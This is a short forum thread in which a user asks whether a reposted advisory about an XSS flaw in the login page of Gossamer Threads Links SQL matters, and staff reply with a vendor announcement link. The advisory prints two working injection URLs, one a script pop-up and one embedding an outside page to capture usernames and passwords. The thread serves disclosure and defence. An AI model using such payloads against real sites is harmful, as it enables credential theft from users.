Gossamer Forum
Home : Products : Gossamer Forum : Development, Plugins and Globals :

XSS vulnerability is it a problem ?

Quote Reply
XSS vulnerability is it a problem ?
Hello, is the following a problem really ?
I didn t find anything in the forum.
It s from http://www.nessus.org

The URL variable in the Gossamer Threads Links SQL login page (user.cgi) is a hidden \
field in the login form and can be passed directly to user.cgi in the form of \
user.cgi?url="xyz" The URL variable is client side input created by the browser when \
a user clicks on a link which requires authentication. After authentication the user \
is redirected to the URL in the URL variable. This URL variable does not \
sufficiently validate the client side input and is therefore vulnerable to script \
injection and cross site scripting (XSS) attacks.

This is a standard XSS vulnerability.

Note an attacker would normally obfuscate the linking code but for these examples I \
have made it simple for the sake of understanding.

Simple Example 1 (Pop up)
/user.cgi?url=">&lt;script&gt;alert("XSS Vulnerability")&lt;/script&gt;<"&from=rate

Resulting in the following within the HTML being injected:
<input type="hidden" name="url" value="">&lt;script&gt;alert("XSS \
Vulnerability")&lt;/script&gt;<"" />

Simple Example 2 (iframe to steal username and password)
/user.cgi?url="><iframe%20src="http://www.stationx.net/linksql.html"%20scrolling="No"% \
20align="MIDDLE"%20width="100%"%20height="3000"%20frameborder="No"></iframe><!--&from= \
rate regards

Quote Reply
Re: [manne] XSS vulnerability is it a problem ? In reply to
We have an announcement about this here: http://www.gossamer-threads.com/...orum.cgi?post=281029

Quote Reply
Re: [brewt] XSS vulnerability is it a problem ? In reply to
Is this a problem in GForum as well? Links SQL seems to be referenced, but being this post is in one of the GForum forums, I wasn't sure.

Quote Reply
Re: [SeanP] XSS vulnerability is it a problem ? In reply to
There aren't any known XSS vulnerabilities with gforum (as it html escapes everything by default) - this was just posted in the wrong forum.